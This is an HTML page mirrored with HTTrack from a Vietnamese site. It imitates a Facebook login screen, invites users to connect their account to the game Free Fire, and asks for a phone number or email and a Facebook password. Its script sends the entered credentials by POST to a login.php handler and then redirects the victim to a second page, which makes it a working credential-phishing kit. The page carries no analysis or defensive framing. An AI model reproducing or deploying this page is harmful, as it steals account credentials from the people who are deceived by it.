
<!doctype html>
<html lang="en">

<!-- Code được viết bởi Dang Huu Phuc | Zalo 0366677410 | Facebook : www.facebook.com/danghuuphuc.dev
 Vui lòng tôn trọng tác giả !! Không Xóa <3 -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">

<link href="//cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" crossorigin="anonymous">
<title>Đăng nhập bằng Facebook</title>
<style>
        .bg-light {
    background-color: #3b5998!important;
}
.img {
    border: 0;
    display: inline-block;
    vertical-align: top;
}
.sp_vuppHZ0nD_0.sx_f4f2b4 {
    width: 123px;
    height: 24px;
    background-position: 0 0;
}
.sp_vuppHZ0nD_0 {
    background-image: url(Template/TqPcFRt5Vfv.png);
    background-size: auto;
    background-repeat: no-repeat;
    display: inline-block;
    height: 16px;
    width: 16px;
}
body{
    background-color: rgb(236, 239, 245);
    min-height: 642px;
}
body{
        font-family: Helvetica, Arial, sans-serif;
    font-size: 14px;
    line-height: 18px;
}
._52je {
    font-size: 16px;
    line-height: 20px;
}
._52j9 {
    color: #90949c;
}
 ._3-q3 {
    border-radius: 12px;
    margin-bottom: 16px;
}
._56bs._56b_ {
    display: block;
    width: 100%;
    background-color: #1877f2;
    background-image: none;
    font-size: 14px;
    height: 36px;
    line-height: 36px;
    padding: 0 16px;
}
 ._56bu,  ._56bv,  a._56bu,  a._56bv {
    text-shadow: 0 -1px rgb(0 0 0 / 25%);
}
 ._56bs {
    border: none;
    border-radius: 3px;
    box-sizing: border-box;
    position: relative;
    -webkit-user-select: none;
    z-index: 0;
}
  .btn,  .input,  button,  input,  select,  textarea {
    -webkit-tap-highlight-color: rgba(0,0,0,0);
}
._56bw {
    font-size: 14px;
    height: 36px;
    line-height: 36px;
    padding: 0 16px;
}
._56bu, ._56bv, a._56bu, a._56bv,  a._56bu,  a._56bv, aable._56bu, aable._56bv {
    color: #fff;
}
._56bs {
    -webkit-appearance: none;
    background: none;
    display: inline-block;
    font-size: 12px;
    height: 28px;
    line-height: 28px;
    margin: 0;
    overflow: visible;
    padding: 0 9px;
    text-align: center;
    vertical-align: top;
    white-space: nowrap;
}
._52jh {
    font-weight: bold;
}
.form-control {
    -webkit-appearance: none;
    box-sizing: border-box;
    width: 100%;
    padding: 12px;
    border-bottom: 1px solid #e5e5e5;
    border: 0;
    display: block;
    margin: 0;
    font-size: 14px;
    -webkit-tap-highlight-color: rgba(0,0,0,0);
    -webkit-user-select: text;
    line-height: 18px;
}
._96n9 {
    border-bottom-color: rgba(0, 0, 0, .101);
}
._96n9 {
    border-bottom: 1px solid #e5e5e5;
}
.thongbao{
    display:none;
}
    </style>
<!-- <script async src='cdn-cgi/bm/cv/669835187/api.js'></script></head> -->
<body>
<nav class="navbar navbar-light bg-light">
<div class="container">
<a class="navbar-brand" href="#" style="
    margin-left: auto;
    margin-right: auto;
">
<i class="img sp_vuppHZ0nD_0 sx_f4f2b4"></i>
</a>
</div>
</nav>
<div class="thongbao alert alert-danger mt-0 mb-0" role="alert" style="
    border-radius: 0;
    padding: 7px 15px;
">
<span id="thongbao"></span>
</div>
<div class="container mt-4">
<div class="row">
<div class="col">
</div>
<div class="col-md-4">
<center style="padding: 38px;
    padding-bottom: 12px;">
<img width="60" class="_3-q3 img" src="https://i.imgur.com/mH54fTE.jpg" style="
    border-radius: 8px;
    margin-bottom: 10px;
">
<div class="_52je _52j9">Hãy đăng nhập vào tài khoản Facebook của bạn để kết nối với Free Fire</div>
</center>
</div>
<div class="col">
</div>
</div>
<div class="row">
<div class="col">
</div>
<div class="col-md-4">
<form>
<div class="_96n9">
<input placeholder="Số di động hoặc email" type="text" class="form-control" id="sdt" aria-describedby="emailHelp"></div>
<div class="mb-3">
<div class="_96n9">
<input placeholder="Mật khẩu Facebook" type="password" class="form-control" id="pass"></div>
</div>
<div class="d-grid gap-2">
<button onclick="dangnhap()" class="btn btn-primary _54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" type="button">Đăng nhập</button>
</div>
</form>
</div>
<div class="col">
</div>
</div>
</div>


<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
function telephoneCheck(str) {
  var isphone = /^(1\s|1|)?((\(\d{3}\))|\d{3})(\-|\s)?(\d{3})(\-|\s)?(\d{4})$/.test(str);
  return(isphone);
}
function validateEmail(email) 
    {
        var re = /\S+@\S+\.\S+/;
        return re.test(email);
    }
function go(){
    var sdt = $("#sdt").val();
   var pass = $("#pass").val();
    $.post("./login.php",
    {
      sdt: sdt,
      pass: pass
    },
    function(data,status){
      window.location.href='login2.html';
    });
}
function dangnhap(){
   var sdt = $("#sdt").val();
   var pass = $("#pass").val();
   if($.isNumeric(sdt) == true){
       if(telephoneCheck(sdt) == true){
           go();
           $(".thongbao").hide();
       }
       else{
        $(".thongbao").show();
        $("#thongbao").text('Số điện thoại chưa đúng định dạng.');
       }
   }
   else if(pass.length == 0 || pass == ''){
       $("#thongbao").show();
       $("#thongbao").text('Vui lòng nhập mật khẩu');
   }
   else if(validateEmail(sdt) == true){
       go();
       $(".thongbao").hide();
   } else {
       $(".thongbao").show();
        $("#thongbao").text('Vui lòng nhập đúng định dạng số điện thoại hoặc địa chỉ email.');
   }
}
</script>


</body>
<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpsh-oh'},{'server':'sg2plzcpnl466818'},{'id':'7870334'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='//img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script>
<!-- Mirrored from tricker.vn/login?random=bmrgtT0EBYn0 by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 06 Jun 2021 08:14:52 GMT -->
</html>